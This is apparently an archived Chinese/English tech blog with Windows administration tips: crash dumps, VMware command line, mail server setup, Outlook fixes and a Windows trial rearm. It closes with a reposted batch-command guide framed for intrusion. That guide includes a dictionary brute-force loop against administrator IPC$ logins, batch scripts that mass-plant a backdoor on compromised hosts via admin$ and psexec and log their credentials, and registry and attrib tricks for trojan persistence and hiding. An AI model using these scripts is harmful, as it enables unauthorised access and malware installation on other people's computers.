Ring0

免费自助建站工具

2011-05-17T22:00:00.000+08:00

Tap（www.tap.cn）是一个新型的免费自助建站工具，它可以创建并管理包括网站在内的各种网络应用。易用、专业、高效的 Tap 能让您轻松摆脱建站过程中技术对创造力的制约。拥有极高自由度的Tap能够快速提升您的建站热情。Tap为不同用户的需求配备了完美的个性化解决方案， Tap 始终致力于将网站建设这一互联网核心应用普及大众。

Crash Dump on window 7

2009-12-15T13:40:00.002+08:00

Windows 7 systems that were configured to generate crash dumps were crashing but not leaving behind a dump file. After having ruled out the usual reasons such as too small of a paging file or not enough disk space to save the dump, there was definitely something strange going on.

What we discovered is that a new policy has been added to Windows when it comes to crash dump file retention. Apparently, certain customers are complaining about the amount of disk space that crash dump files consume and don't want them saved anymore (we're sure they'll regret this decision in the future if their systems ever crash). In order to address this issue, a new set of criteria has been created that determines whether or not Windows saves a crash dump file.

The new criteria are as follows:

1) If the machine is running a server version of the O/S, the crash dump is always saved.

2) If the machine is joined to a domain, the crash dump is always saved.

3) If the amount of free space on the disk is greater than or equal to 25GB, the crash dump is saved.

Otherwise, the crash dump file will not be saved and you'll be left scratching your head. Luckily, a new registry value has been added that will override this behavior and always cause the crash dump file to be generated. By setting the \HKLM\System\CCS\Control\CrashControl\AlwaysKeepMemoryDump DWORD value to 1 you will guarantee that you will always have a crash dump file after crashing the system.

Operate Virtual machine from command line

2008-12-05T15:10:00.001+08:00

This page describe command line options that are available when you launch VMware Workstation. There are two methods to operate virtual machines via command line, vmrun application or vmware itself.
VMRUN Application

VMware Workstation includes a separate application, vmrun. To launch the vmrun application, from the command prompt, enter:

vmrun COMMAND Parameters[]

Valid vmrun commands and options are described in the following :
Command Parameters Description
list list all running VMs
start path to vmx or vmtm file start a VM or Team
stop path to vmx or vmtm file stop a VM or Team
reset path to vmx or vmtm file reset a VM or Team
suspend path to vmx or vmtm file suspend a VM or Team
upgradevm path to vmx Upgrade a virtual machine to the current Workstation version
installtools Path to vmx file Install Tools in Guest OS
listSnapshots Path to vmx file List all snapshots in a VM
snapshot Path to vmx file Create a snapshot of a VM
deleteSnapshot Path to vmx file Remove a snapshot from a VM Snapshot name
revertToSnapshot Path to vmx file Set VM state to a snapshot

example:

to start a virtual machine
vmrun start c:\My Virtual Machines\.vmx

With virtual machines that require input through a VMware Workstation dialog box, vmrun may time out and fail. To disable Workstation dialog boxes, insert the following line into the .vmx configuration file for a virtual machine:

msg.autoAnswer = TRUE
VMware

VMware -x -X -q -s = -v / / .virtual machinex
Option Description
-x Automatically powers on the virtual machine when VMware Workstation starts
-X Automatically powers on the virtual machine, then switches the VMware Workstation window to full screen mode
-q Closes the virtual machine's tab when the virtual machine powers off. If no other virtual machine is open, it also exits VMware Workstation. This is particularly useful when the guest operating system is capable of powering off the virtual machine
-s Sets the specified variable to the specified value. Any variable names and values that are valid in the configuration file may be specified on the command line with the -s switch
-v Displays the product name, version and build number
//.vmx Launches a virtual machine using the specified configuration file

example:
launches the Windows Me virtual machine specified, powers it on automatically and switches to full screen mode
"C:\Program Files\VMware\VMware Workstation\Programs\VMware.exe -X C:\Documents and Settings\\My Documents\My Virtual Machines\Windows Me\Windows Me.vmx"

安装系统时候报找不到硬盘驱动

2008-11-17T15:55:00.003+08:00

Setup did not find any hard disk drives installed in your computer. Make sure any hard disk drives are powered on and properly connected to your computer, and that any disk-related hardware configuration is correct. This may involve running a manufacturer-supplied diagnostic or setup program. Setup cannot continue. To quit Setup, press F3.

如果是SATA硬盘引起的，比较简单的解决方式是进入BIOS，从RAID模式改到IDE模式，参考下文：
http://www.raymond.cc/blog/archives/2008/01/21/install-xp-setup-did-not-find-any-hard-disk-drives-installed-in-your-computer/

不同的主板可能不太一样，比如我的是从RAID/AHCI -> RAID/SATA就好了

WIN2K3 Server 上搭建SMTP，POP3服务器

2008-06-04T13:11:00.001+08:00

纯转载
Win2003里自带的SMTP/POP3一般应用就足够

一、安装POP3和SMTP服务组件

Windows Server 2003默认情况下是没有安装POP3和SMTP服务组件的，因此我们要手工添加。

1.安装POP3服务组件

以系统管理员身份登录Windows Server 2003 系统。依次进入“控制面板→添加或删除程序→添加/删除Windows组件”，在弹出的“Windows组件向导”对话框中选中“电子邮件服务”选项，点击“详细信息”按钮，可以看到该选项包括两部分内容：POP3服务和POP3服务Web管理。为方便用户远程Web方式管理邮件服务器，建议选中 “POP3服务Web管理”。

2.安装SMTP服务组件

选中“应用程序服务器”选项，点击“详细信息”按钮，接着在“Internet信息服务（IIS）”选项中查看详细信息，选中“SMTP Service”选项，最后点击“确定”按钮。此外，如果用户需要对邮件服务器进行远程Web管理，一定要选中“万维网服务”中的“远程管理（HTML）”组件。完成以上设置后，点击“下一步”按钮，系统就开始安装配置POP3和SMTP服务了。

二、配置POP3服务器

1.创建邮件域

点击“开始→管理工具→POP3服务”，弹出POP3服务控制台窗口。选中左栏中的POP3服务后，点击右栏中的“新域”，弹出“添加域”对话框，接着在 “域名”栏中输入邮件服务器的域名，也就是邮件地址“@”后面的部分，如“rtj.net”，最后点击“确定”按钮。其中“rtj.net”为在 Internet上注册的域名，并且该域名在DNS服务器中设置了MX邮件交换记录，解析到Windows Server 2003邮件服务器IP地址上。

2.创建用户邮箱

选中刚才新建的“rtj.net”域，在右栏中点击“添加邮箱”，弹出添加邮箱对话框，在“邮箱名”栏中输入邮件用户名，然后设置用户密码，最后点击“确定”按钮，完成邮箱的创建。

三、配置SMTP服务器

完成POP3服务器的配置后，就可开始配置SMTP服务器了。点击“开始→程序→管理工具→Internet信息服务（IIS）管理器”，在“IIS管理器”窗口中右键点击“默认SMTP虚拟服务器”选项，在弹出的菜单中选中“属性”，进入“默认SMTP虚拟服务器”窗口，切换到“常规”标签页，在“IP 地址”下拉列表框中选中邮件服务器的IP地址即可。点击“确定”按钮，这样一个简单的邮件服务器就架设完成了。

完成以上设置后，用户就可以使用邮件客户端软件连接邮件服务器进行邮件收发工作了。在设置邮件客户端软件的SMTP和POP3服务器地址时，输入邮件服务器的域名“rtj.net”即可。

四、远程Web管理

Windows Server 2003还支持对邮件服务器的远程Web管理。在远端客户机中，运行IE浏览器，在地址栏中输入“https://服务器IP地址：8098”，将会弹出连接对话框，输入管理员用户名和密码，点击“确定”按钮，即可登录Web管理界面。

还有很多专门软件可以采用
文章见下边链接
参考资料：http://www.blueidea.com/computer/net/2005/2972.asp

--------转载结束的分割线---------------

其中“rtj.net”为在 Internet上注册的域名，并且该域名在DNS服务器中设置了MX邮件交换记录，解析到Windows Server 2003邮件服务器IP地址上。

作为一个懒人，我不想配DNS，所以修改了hosts文件

windows下命令行获取磁盘空闲空间大小

2008-05-29T13:05:00.004+08:00

DIR | FIND "free"

汗一下这么简单。。亏我翻了半天diskpart的帮助，想找到如何获取磁盘可用空间，原来最简单的dir就能搞定,悲愤啊

最近遇到关于outlook的两个小问题

2008-05-23T14:41:00.002+08:00

问题1：boss发来的会议信件，选择接收后不能在日历里显示出来。误了我两回开会。。。
原因:是我把boss的信设置了自动归档，outlook默认不显示此类Calendar
解决：在Calendar里面勾选Calendar in Archive folders

问题2：Outlook 常年处于离线状态，从自动收信变为手动收信>_<
原因：大约是某次网络抽风的时候，outlook提示要offline工作，我选了Yes，从此就一直离线工作了
解决：http://www.buffalostate.edu/depts/csdept/documentation/faqs/FAQ/facstaff/facemailoffline.html
1. Click the View menu and make sure there is a check mark next to Status Bar
2. Click on the word Offline in the very bottom right-hand corner of the Outlook window
3. When the menu appears, click once on Work Offline to remove the check mark (see picture)

4. After a few seconds your mailbox should be up-to-date

Microsoft Windows Xp - Command-Line Reference A-Z

2008-05-07T11:53:00.002+08:00

网上搜了一圈，英文版的都是BT下载，中文版的都要注册，麻烦的紧所以在这里放一个中文版下载，CHM格式：

命令行参考 A-Z.chm

获取系统启动时间

2008-05-06T17:30:00.002+08:00

在windows自带的perfmon的add counters里面，performance选 system，下面选System up time
关于这个值：

System Up Time is the elapsed time (in seconds) that the computer has been running since it was last started. This counter displays the difference between the start time and the current time.

更简单的：

systeminfo | find /i "up time"

当然后面的 “up time”随系统语言设置变化也要变，不嫌列表太长的光输入systeminfo也行。。。难怪我开始在中文系统上怎么都找不到。。

vista和2008server 过期后如何再次激活

2008-04-15T15:33:00.004+08:00

通过这个命令，可以再获取三十天的使用期:

Slmgr.vbs –rearm

如果有VMware snapshot，只要在重启前输入这个指令就好了。
如果是真实机器，那么打开IE然后输入cmd，然后再输入指令就好了

~~~~~~~~~~~~~~~~~~~~~~~~~~~幸福结束的分割线~~~~~~~~~~~~~~~~~~~~~~
我在VMware上用过一次，不过。。。没起作用。。。
另外，我疑心这个东西需要管理员权限，这样再IE中启动的cmd能否成功运行此命令也是个问题咧
还有，这不是一个crack，而是微软内部使用的东东，所以。。。说不定哪个补丁打上去这个东西就不work了

命令行打开控制面板的两种方法

2008-01-21T20:45:00.000+08:00

第一种：
Control.exe 调用［控制面板］程序。使用时不带参数可起动［控制面板］，若利用命令行在其后跟上某个控制项目文件名（.cpl类型，在System目录中能找到），将打开具体的控制项，如果再空一格并加上以逗号开头的数字代码，则可直接进入具体控制项的某一栏（控制项首栏数字代码是0)。如：
Control desk.cpl ,3后，将调出［显示］属性/设置］窗口

第二种：
rundll32.exe shell32.dll,Control_RunDLL ---------------------------显示控制面板
rundll32.exe shell32.dll,Control_RunDLL access.cpl,,1----------显示辅助功能选项
rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl @1－－---打开系统属性
rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,1－－----删除或添加程序
rundll32.exe syncui.dll,Briefcase_Create－－－－----------------桌面上建立公文包
rundll32.exe diskcopy.dll,DiskCopyRunDll－－－－---------------复制软盘驱动器
rundll32.exe shell32.dll,Control_RunDLL timedate.cpl,,0－－显示时间属性

俨然第一种容易得多。

好冷。。。

2008-01-02T23:13:00.000+08:00

hushlight:MS还开发过64位 Windows 2000呀，看来胎死腹中了
鸦鸦：nod, MS里面估计有一堆堆的死婴。。

真是好冷。。。

说起来SQL server 2000倒是有64位版本，不过只支持安腾处理器，死贵死贵

bat命令大全zz

2007-12-25T12:39:00.000+08:00

一.简单批处理内部命令简介
1.Echo 命令
打开回显或关闭请求回显功能，或显示消息。如果没有任何参数，echo 命令将显示当前回显设置。
语法
echo [{on│off}] [message]
Sample：@echo off / echo hello world
在实际应用中我们会把这条命令和重定向符号（也称为管道符号，一般用> >> ^）结合来实现输入一些命令到特定格式的文件中.这将在以后的例子中体现出来。

2.@ 命令
表示不显示@ 后面的命令，在入侵过程中（例如使用批处理来格式化敌人的硬盘）自然不能让对方看到你使用的命令啦。
Sample：@echo off
@echo Now initializing the program,please wait a minite...
@format X: /q/u/autoset (format 这个命令是不可以使用/y这个参数的，可喜的是微软留了个autoset这个参数给我们，效果和/y是一样的。)

3.Goto 命令
指定跳转到标签，找到标签后，程序将处理从下一行开始的命令。
语法：goto label （label是参数，指定所要转向的批处理程序中的行。）
Sample：
if {%1}=={} goto noparms
if {%2}=={} goto noparms（如果这里的if、%1、%2就是表示变量。）
@Rem check parameters if null show usage
:noparms
echo Usage: monitor.bat ServerIP PortNumber
goto end
标签的名字可以随便起，但是最好是有意义的字母啦，字母前加个：用来表示这个字母是标签， : 开头的字符行 , 在批处理中都被视作标号 , 而直接忽略其后的所有内容 , 只是为了与正常的标号相区别 , 建议使用 goto 所无法识别的标号 , 即在 : 后紧跟一个非字母数字的一个特殊符号 . goto 命令就是根据这个：来寻找下一步跳到到那里。最好有一些说明这样你别人看起来才会理解你的意图啊。

4.Rem 命令
注释命令，起一个注释的作用，便于别人阅读和你自己日后修改。
Rem Message
Sample：@Rem Here is the description.

5.Pause 命令
运行 Pause 命令时，将显示下面的消息：
Press any key to continue . . .
Sample：
@echo off
:begin
copy a:*.* d： \back
echo Please put a new disk into driver A
pause
goto begin
在这个例子中，驱动器 A 中磁盘上的所有文件均复制到d:\back中。显示的注释提示您将另一张磁盘放入驱动器 A 时，pause 命令会使程序挂起，以便您更换磁盘，然后按任意键继续处理。

6.Call 命令
从一个批处理程序调用另一个批处理程序，并且不终止父批处理程序。call 命令接受用作调用目标的标签。如果在脚本或批处理文件外使用 Call，它将不会在命令行起作用。
语法
call [[Drive:][Path] FileName [BatchParameters]] [:label [arguments]]
参数
[Drive:}[Path] FileName
指定要调用的批处理程序的位置和名称。filename 参数必须具有 .bat 或 .cmd 扩展名。

7.start 命令
调用外部程序，所有的DOS命令和命令行程序都可以由start命令来调用。
入侵常用参数：
MIN 开始时窗口最小化
SEPARATE 在分开的空间内开始 16 位 Windows 程序
HIGH 在 HIGH 优先级类别开始应用程序
REALTIME 在 REALTIME 优先级类别开始应用程序
WAIT 启动应用程序并等候它结束
parameters 这些为传送到命令/程序的参数
执行的应用程序是 32-位 GUI 应用程序时，CMD.EXE 不等应用程序终止就返回命令提示。如果在命令脚本内执行，该新行为则不会发生。

8.choice 命令
choice 使用此命令可以让用户输入一个字符，从而运行不同的命令。使用时应该加/c:参数，c:后应写提示可输入的字符，之间无空格。它的返回码为 1234......
如 : choice /c:dme defrag,mem,end
将显示
defrag,mem,end[D,M,E]?
Sample：
Sample.bat的内容如下 :
@echo off
choice /c:dme defrag,mem,end
if errorlevel 3 goto defrag （应先判断数值最高的错误码）
if errorlevel 2 goto mem
if errotlevel 1 goto end

:defrag
c:\dos\defrag
goto end
:mem
mem
goto end
:end
echo good bye

此文件运行后，将显示 defrag,mem,end[D,M,E]? 用户可选择d m e ，然后if语句将作出判断，d表示执行标号为defrag的程序段，m表示执行标号为mem的程序段，e表示执行标号为end的程序段，每个程序段最后都以goto end将程序跳到end标号处，然后程序将显示good bye，文件结束。

9.If 命令

if 表示将判断是否符合规定的条件，从而决定执行不同的命令。有三种格式 :
a、if "参数" == "字符串" 　待执行的命令
参数如果等于指定的字符串，则条件成立，运行命令，否则运行下一句。(注意是两个等号）
如 if "%1"=="a" format a:
if {%1}=={} goto noparms
if {%2}=={} goto noparms

b 、if exist 文件名　待执行的命令
如果有指定的文件，则条件成立，运行命令，否则运行下一句。
如if exist config.sys edit config.sys

c 、if errorlevel / if not errorlevel 数字　待执行的命令
如果返回码等于指定的数字，则条件成立，运行命令，否则运行下一句。
如if errorlevel 2 goto x2 　
DOS程序运行时都会返回一个数字给DOS，称为错误码errorlevel或称返回码，常见的返回码为0、1。

10.for 命令
for 命令是一个比较复杂的命令，主要用于参数在指定的范围内循环执行命令。
在批处理文件中使用 FOR 命令时，指定变量请使用 %%variable

for {%variable│%%variable} in (set) do command [ CommandLineOptions]
%variable 指定一个单一字母可替换的参数。
(set) 指定一个或一组文件。可以使用通配符。
command 指定对每个文件执行的命令。
command-parameters 为特定命令指定参数或命令行开关。
在批处理文件中使用 FOR 命令时，指定变量请使用 %%variable
而不要用 %variable。变量名称是区分大小写的，所以 %i 不同于 %I

如果命令扩展名被启用，下列额外的 FOR 命令格式会受到支持:

FOR /D %variable IN (set) DO command [command-parameters]

如果集中包含通配符，则指定与目录名匹配，而不与文件名匹配。

FOR /R [[drive:]path] %variable IN (set) DO command [command-

检查以 [drive:]path 为根的目录树，指向每个目录中的 FOR 语句。如果在 /R 后没有指定目录，则使用当前目录。如果集仅为一个单点(.)字符，则枚举该目录树。

FOR /L %variable IN (start,step,end) DO command [command-para

该集表示以增量形式从开始到结束的一个数字序列。因此，(1,1,5) 将产生序列 1 2 3 4 5，(5,-1,1) 将产生序列 (5 4 3 2 1)。

FOR /F ["options"] %variable IN (file-set) DO command
FOR /F ["options"] %variable IN ("string") DO command
FOR /F ["options"] %variable IN ('command') DO command

或者，如果有 usebackq 选项:

FOR /F ["options"] %variable IN (file-set) DO command
FOR /F ["options"] %variable IN ("string") DO command
FOR /F ["options"] %variable IN ('command') DO command

filenameset 为一个或多个文件名。继续到 filenameset 中的下一个文件之前，每份文件都已被打开、读取并经过处理。处理包括读取文件，将其分成一行行的文字，然后将每行解析成零或更多的符号。然后用已找到的符号字符串变量值调用 For 循环。以默认方式，/F 通过每个文件的每一行中分开的第一个空白符号。跳过空白行。您可通过指定可选 "options" 参数替代默认解析操作。这个带引号的字符串包括一个或多个指定不同解析选项的关键字。这些关键字为:

eol=c - 指一个行注释字符的结尾(就一个 )
skip=n - 指在文件开始时忽略的行数。
delims=xxx - 指分隔符集。这个替换了空格和跳格键的默认分隔符集。
tokens=x,y,m-n - 指每行的哪一个符号被传递到每个迭代的 for 本身。这会导致额外变量名称的格式为一个范围。通过 nth 符号指定 m 符号字符串中的最后一个字符星号，那么额外的变量将在最后一个符号解析之分配并接受行的保留文本。
usebackq - 指定新语法已在下类情况中使用: 在作为命令执行一个后引号的字符串并且引号字符为文字字符串命令并允许在 fi中使用双引号扩起文件名称。
sample1:
FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do command

会分析 myfile.txt 中的每一行，忽略以分号打头的那些行，将每行中的第二个和第三个符号传递给 for 程序体；用逗号和/或空格定界符号。请注意，这个 for 程序体的语句引用 %i 来取得第二个符号，引用 %j 来取得第三个符号，引用 %k 来取得第三个符号后的所有剩余符号。对于带有空格的文件名，您需要用双引号将文件名括起来。为了用这种方式来使用双引号，您还需要使用 usebackq 选项，否则，双引号会被理解成是用作定义某个要分析的字符串的。

%i 专门在 for 语句中得到说明，%j 和 %k 是通过tokens= 选项专门得到说明的。您可以通过 tokens= 一行指定最多 26 个符号，只要不试图说明一个高于字母 'z' 或'Z' 的变量。请记住，FOR 变量是单一字母、分大小写和全局的；同时不能有 52 个以上都在使用中。

您还可以在相邻字符串上使用 FOR /F 分析逻辑；方法是，用单引号将括号之间的 filenameset 括起来。这样，该字符串会被当作一个文件中的一个单一输入行。

最后，您可以用 FOR /F 命令来分析命令的输出。方法是，将括号之间的 filenameset 变成一个反括字符串。该字符串会被当作命令行，传递到一个子 CMD.EXE，其输出会被抓进内存，并被当作文件分析。因此，以下例子:

FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i

会枚举当前环境中的环境变量名称。另外，FOR 变量参照的替换已被增强。您现在可以使用下列选项语法:

~I - 删除任何引号(")，扩充 %I
%~fI - 将 %I 扩充到一个完全合格的路径名
%~dI - 仅将 %I 扩充到一个驱动器号
%~pI - 仅将 %I 扩充到一个路径
%~nI - 仅将 %I 扩充到一个文件名
%~xI - 仅将 %I 扩充到一个文件扩展名
%~sI - 扩充的路径只含有短名
%~aI - 将 %I 扩充到文件的文件属性
%~tI - 将 %I 扩充到文件的日期/时间
%~zI - 将 %I 扩充到文件的大小
%~$PATH:I - 查找列在路径环境变量的目录，并将 %I 扩充到找到的第一个完全合格的名称。如果环境变量未被定义，或者没有找到文件，此组合键会扩充空字符串

可以组合修饰符来得到多重结果:

%~dpI - 仅将 %I 扩充到一个驱动器号和路径
%~nxI - 仅将 %I 扩充到一个文件名和扩展名
%~fsI - 仅将 %I 扩充到一个带有短名的完整路径名
%~dp$PATH:i - 查找列在路径环境变量的目录，并将 %I 扩充到找到的第一个驱动器号和路径。
%~ftzaI - 将 %I 扩充到类似输出线路的 DIR

在以上例子中，%I 和 PATH 可用其他有效数值代替。%~ 语法用一个有效的 FOR 变量名终止。选取类似 %I 的大写变量名比较易读，而且避免与不分大小写的组合键混淆。

以上是MS的官方帮助，下面我们举几个例子来具体说明一下For命令在入侵中的用途。

sample2 ：

利用For命令来实现对一台目标Win2k主机的暴力密码破解。
我们用net use \\ip\ipc$ "password" /u:"administrator"来尝试这和目标主机进行连接，当成功时记下密码。
最主要的命令是一条： for /f i% in (dict.txt) do net use \\ip\ipc$ "i%" /u:"administrator"
用i%来表示admin的密码，在dict.txt中这个取i%的值用net use 命令来连接。然后将程序运行结果传递给find命令－－
for /f i%% in (dict.txt) do net use \\ip\ipc$ "i%%" /u:"administrator"│find ": 命令成功完成">>D:\ok.txt ，这样就ko了。

sample3 ：

你有没有过手里有大量肉鸡等着你去种后门＋木马呢？，当数量特别多的时候，原本很开心的一件事都会变得很郁闷：）。文章开头就谈到使用批处理文件，可以简化日常或重复性任务。那么如何实现呢？呵呵，看下去你就会明白了。

主要命令也只有一条：（在批处理文件中使用 FOR 命令时，指定变量使用 %%variable）
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat %%i %%j %%k
tokens的用法请参见上面的sample1，在这里它表示按顺序将victim.txt中的内容传递给door.bat中的参数%i %j %k。
而cultivate.bat无非就是用net use命令来建立IPC$连接，并copy木马＋后门到victim，然后用返回码（If errorlever =）来筛选成功种植后门的主机，并echo出来，或者echo到指定的文件。
delims= 表示vivtim.txt中的内容是一空格来分隔的。我想看到这里你也一定明白这victim.txt里的内容是什么样的了。应该根据%%i %%j %%k表示的对象来排列，一般就是 ip password username。
代码雏形：
--------------- cut here then save as a batchfile(I call it main.bat ) ---------------------------
@echo off
@if "%1"=="" goto usage
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k
@goto end
:usage
@echo run this batch in dos modle.or just double-click it.
:end
--------------- cut here then save as a batchfile(I call it main.bat ) ---------------------------

------------------- cut here then save as a batchfile(I call it door.bat) -----------------------------
@net use \\%1\ipc$ %3 /u:"%2"
@if errorlevel 1 goto failed
@echo Trying to establish the IPC$ connection ............OK
@copy windrv32.exe\\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3 >>ko.txt
@p*** ec \\%1 c:\winnt\system32\windrv32.exe
@p*** ec \\%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt
:failed
@echo Sorry can not connected to the victim.
----------------- cut here then save as a batchfile(I call it door.bat) --------------------------------
这只是一个自动种植后门批处理的雏形，两个批处理和后门程序（Windrv32.exe）,PSexec.exe需放在统一目录下.批处理内容
尚可扩展,例如:加入清除日志+DDOS的功能,加入定时添加用户的功能,更深入一点可以使之具备自动传播功能(蠕虫).此处不多做叙述,有兴趣的朋友可自行研究.

二.如何在批处理文件中使用参数
批处理中可以使用参数，一般从1%到 9%这九个，当有多个参数时需要用shift来移动，这种情况并不多见，我们就不考虑它了。
sample1： fomat.bat
@echo off
if "%1"=="a" format a:
:format
@format a:/q/u/auotset
@echo please insert another disk to driver A.
@pause
@goto fomat
这个例子用于连续地格式化几张软盘，所以用的时候需在dos窗口输入fomat.bat a，呵呵,好像有点画蛇添足了～
sample2：
当我们要建立一个IPC$连接地时候总要输入一大串命令，弄不好就打错了，所以我们不如把一些固定命令写入一个批处理，把肉鸡地ip password username 当着参数来赋给这个批处理，这样就不用每次都打命令了。
@echo off
@net use \\1%\ipc$ "2%" /u:"3%" 注意哦，这里PASSWORD是第二个参数。
@if errorlevel 1 echo connection failed
怎么样,使用参数还是比较简单的吧？你这么帅一定学会了 .No.3
三.如何使用组合命令(Compound Command)

1.&

Usage ：第一条命令 & 第二条命令 [& 第三条命令...]

用这种方法可以同时执行多条命令，而不管命令是否执行成功

Sample ：
C:\>dir z: & dir c:\Ex4rch
The system cannot find the path specified.
Volume in drive C has no label.
Volume Serial Number is 0078-59FB

Directory of c:\Ex4rch

2002-05-14 23:51 .
2002-05-14 23:51 ..
2002-05-14 23:51 14 sometips.gif

2.&&

Usage ：第一条命令 && 第二条命令 [&& 第三条命令...]

用这种方法可以同时执行多条命令，当碰到执行出错的命令后将不执行后面的命令，如果一直没有出错则一直执行完所有命令；

Sample ：
C:\>dir z: && dir c:\Ex4rch
The system cannot find the path specified.

C:\>dir c:\Ex4rch && dir z:
Volume in drive C has no label.
Volume Serial Number is 0078-59FB

Directory of c:\Ex4rch

2002-05-14 23:55 .
2002-05-14 23:55 ..
2002-05-14 23:55 14 sometips.gif
1 File(s) 14 bytes
2 Dir(s) 768,671,744 bytes free
The system cannot find the path specified.

在做备份的时候可能会用到这种命令会比较简单，如：
dir file&://192.168.0.1/database/backup.mdb && copy file&://192.168.0.1/database/backup.mdb E:\backup
如果远程服务器上存在backup.mdb文件，就执行copy命令，若不存在该文件则不执行copy命令。这种用法可以替换IF exist了：）

3.││

Usage ：第一条命令 ││ 第二条命令 [││ 第三条命令...]

用这种方法可以同时执行多条命令，当碰到执行正确的命令后将不执行后面的命令，如果没有出现正确的命令则一直执行完所有命令；

Sample ：
C:\Ex4rch>dir sometips.gif ││ del sometips.gif
Volume in drive C has no label.
Volume Serial Number is 0078-59FB

Directory of C:\Ex4rch

2002-05-14 23:55 14 sometips.gif
1 File(s) 14 bytes
0 Dir(s) 768,696,320 bytes free

组合命令使用的例子：
sample：
@copy trojan.exe \\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PASS %3 >>victim.txt

四、管道命令的使用

1.│ 命令
Usage：第一条命令 │ 第二条命令 [│ 第三条命令 ...]
将第一条命令的结果作为第二条命令的参数来使用，记得在unix中这种方式很常见。

sample ：
time /t>>D:\IP.log
netstat -n -p tcp│find ":3389">>D:\IP.log
start Explorer
看出来了么？用于终端服务允许我们为用户自定义起始的程序，来实现让用户运行下面这个bat，以获得登录用户的IP。

2.> 、>>输出重定向命令
将一条命令或某个程序输出结果的重定向到特定文件中, > 与 >>的区别在于，>会清除调原有文件中的内容后写入指定文件，而>>只会追加内容到指定文件中，而不会改动其中的内容。

sample1 ：
echo hello world>c:\hello.txt (stupid example?)

sample2:
时下DLL木马盛行，我们知道system32是个捉迷藏的好地方，许多木马都削尖了脑袋往那里钻，DLL马也不例外，针对这一点我们可以在安装好系统和必要的应用程序后，对该目录下的EXE和DLL文件作一个记录：
运行CMD--转换目录到 system32--dir *.exe>exeback.txt & dir *.dll>dllback.txt,
这样所有的EXE和DLL文件的名称都被分别记录到exeback.txt和dllback.txt中 ,
日后如发现异常但用传统的方法查不出问题时,则要考虑是不是系统中已经潜入DLL木马了 .
这时我们用同样的命令将system32下的EXE和DLL文件记录到另外的exeback1.txt和dllback1.txt中,然后运行 :
CMD--fc exeback.txt exeback1.txt>diff.txt & fc dllback.txt dllback1.txt>diff.txt.(用FC命令比较前后两次的DLL和EXE文件,并将结果输入到diff.txt中),这样我们就能发现一些多出来的DLL和EXE文件,然后通过查看创建时间、版本、是否经过压缩等就能够比较容易地判断出是不是已经被DLL木马光顾了。没有是最好，如果有的话也不要直接DEL掉，先用regsvr32 /u trojan.dll将后门DLL文件注销掉,再把它移到回收站里，若系统没有异常反映再将之彻底删除或者提交给杀毒软件公司。

3.< 、>& 、 <&
< 从文件中而不是从键盘中读入命令输入。
>& 将一个句柄的输出写入到另一个句柄的输入中。
<& 从一个句柄读取输入并将其写入到另一个句柄输出中。
这些并不常用，也就不多做介绍。

No.5
五.如何用批处理文件来操作注册表

在入侵过程中经常回操作注册表的特定的键值来实现一定的目的，例如:为了达到隐藏后门、木马程序而删除Run下残余的键值。或者创建一个服务用以加载后门。当然我们也会修改注册表来加固系统或者改变系统的某个属性，这些都需要我们对注册表操作有一定的了解。下面我们就先学习一下如何使用.REG文件来操作注册表.(我们可以用批处理来生成一个REG文件 )
关于注册表的操作，常见的是创建、修改、删除。

1. 创建
创建分为两种，一种是创建子项(Subkey)

我们创建一个文件，内容如下：

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\hacker]

然后执行该脚本，你就已经在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft下创建了一个名字为"hacker"的子项。

另一种是创建一个项目名称
那这种文件格式就是典型的文件格式，和你从注册表中导出的文件格式一致，内容如下：

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Invader"="Ex4rch"
"Door"=C:\\WINNT\\system32\\door.exe
"Autodos"=dword:02

这样就在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下
新建了:Invader、door、about这三个项目
Invader的类型是 "String value"
door的类型是 "REG SZ value"
Autodos的类型是"DWORD value"

2. 修改
修改相对来说比较简单，只要把你需要修改的项目导出，然后用记事本进行修改，然后导入（regedit /s）即可。

3. 删除
我们首先来说说删除一个项目名称，我们创建一个如下的文件：

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Ex4rch"=-

执行该脚本，[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下的"Ex4rch"就被删除了；

我们再看看删除一个子项，我们创建一个如下的脚本：

Windows Registry Editor Version 5.00

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

执行该脚本，[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]就已经被删除了。

相信看到这里，.reg文件你基本已经掌握了。那么现在的目标就是用批处理来创建特定内容的.reg文件了，记得我们前面说道的利用重定向符号可以很容易地创建特定类型的文件。

samlpe1: 如上面的那个例子,如想生成如下注册表文件
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Invader"="Ex4rch"
"door"=hex:255
"Autodos"=dword:000000128
只需要这样：
@echo Windows Registry Editor Version 5.00>>Sample.reg

@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>Sample.reg
@echo "Invader"="Ex4rch">>Sample.reg
@echo "door"=5>>C:\\WINNT\\system32\\door.exe>>Sample.reg
@echo "Autodos"=dword:02>>Sample.reg

samlpe2:
我们现在在使用一些比较老的木马时,可能会在注册表的[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run(Runonce、Runservices、Runexec)]下生成一个键值用来实现木马的自启动.但是这样很容易暴露木马程序的路径,从而导致木马被查杀,相对地若是将木马程序注册为系统服务则相对安全一些.下面以配置好地IRC木马DSNX为例(名为 windrv32.exe)
@start windrv32.exe
@attrib +h +r windrv32.exe
